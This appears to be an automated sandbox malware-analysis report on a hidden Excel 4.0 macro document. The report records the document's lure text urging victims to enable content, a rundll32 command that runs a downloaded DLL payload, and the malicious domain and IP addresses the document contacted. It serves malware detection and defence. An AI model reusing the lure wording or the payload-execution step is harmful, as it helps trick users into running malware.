Play interactive tour

Edit tour

Windows Analysis Report statistic-1496367785.xls

Overview

General Information

Sample Name:	statistic-1496367785.xls
Analysis ID:	441923
MD5:	7fb48e03b899f792be6c3118a46c5c8f
SHA1:	55445d13cd433121c6c2bfb31414b08e31e28a65
SHA256:	1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Sigma detected: Microsoft Office Product Spawning Windows Shell

Yara detected hidden Macro 4.0 in Excel

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Yara detected Xls With Macro 4.0

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2116 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2100 cmdline: rundll32 ..\flamo.vir,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2224 cmdline: rundll32 ..\flamo.vir1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
statistic-1496367785.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security
statistic-1496367785.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\flamo.vir,DllRegisterServer, CommandLine: rundll32 ..\flamo.vir,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2116, ProcessCommandLine: rundll32 ..\flamo.vir,DllRegisterServer, ProcessId: 2100

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: statistic-1496367785.xls	Virustotal: Detection: 37%			Perma Link
Source: statistic-1496367785.xls	ReversingLabs: Detection: 34%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown	HTTPS traffic detected: 162.241.2.112:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.179.232.80:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Source: global traffic

DNS query: name: psq.com.mx

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 162.241.2.112:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 162.241.2.112:443

Source: Joe Sandbox View	IP Address: 108.179.232.80 108.179.232.80
Source: Joe Sandbox View	IP Address: 162.241.2.112 162.241.2.112

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: psq.com.mx

Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: E0968A1E3A40D2582E7FD463BAEB59CD0.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: E0968A1E3A40D2582E7FD463BAEB59CD0.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2342442297.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337877607.0000000001CA7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 49262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49289
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49287
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49286
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49284
Source: unknown	Network traffic detected: HTTP traffic on port 49286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49283
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49280
Source: unknown	Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49276
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49274
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49273
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49271
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 49205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown	Network traffic detected: HTTP traffic on port 49285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 49201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49227
Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 49288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 49242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49219
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown	Network traffic detected: HTTP traffic on port 49219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 49261 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49261
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49260
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49258
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49254
Source: unknown	Network traffic detected: HTTP traffic on port 49287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 49249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49244
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 49248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 49243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49230
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49228
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 443

Source: unknown	HTTPS traffic detected: 162.241.2.112:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.179.232.80:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click En
Source: Screenshot number: 4	Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19 2

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: statistic-1496367785.xls	Initial sample: CALL
Source: statistic-1496367785.xls	Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: statistic-1496367785.xls

Initial sample: Sheet size: 8121

Source: rundll32.exe, 00000003.00000002.2342252530.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2337705757.0000000001AC0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal80.expl.evad.winXLS@5/13@2/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\7BCE0000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC33F.tmp

Jump to behavior

Source: statistic-1496367785.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer

Source: statistic-1496367785.xls	Virustotal: Detection: 37%
Source: statistic-1496367785.xls	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\flamo.vir1,DllRegisterServer

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: statistic-1496367785.xls

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: statistic-1496367785.xls, type: SAMPLE

Source: Yara match

